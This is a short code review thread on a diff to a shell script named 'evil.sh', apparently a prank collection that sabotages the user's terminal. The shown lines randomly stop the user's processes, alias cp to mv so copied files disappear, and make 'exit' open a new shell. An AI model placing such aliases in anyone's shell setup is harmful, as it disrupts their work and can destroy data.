evil.sh

```diff
@@ -63,7 +63,7 @@ sleep $[ ( $RANDOM % 100 )	+ 1 ]s && kill -STOP $(ps x -o pid|sed 1d|sort -R|hea
 alias cp='mv';
 
 # Make `exit` open a new shell.
-alias exit='which $(ps -o "cmd=" -p $(ps -o "ppid=" -p $$))';
+alias exit='$(which $(ps -o "cmd=" -p $(ps -o "ppid=" -p $$)))';
```

Comment:
I'd like to see some more quotation here.
Quoting `$()` in shell is perfectly fine, so this could/should be something like:

```bash
alias exit='"$(foo "$(bar "$(baz "${$}")")")"'
```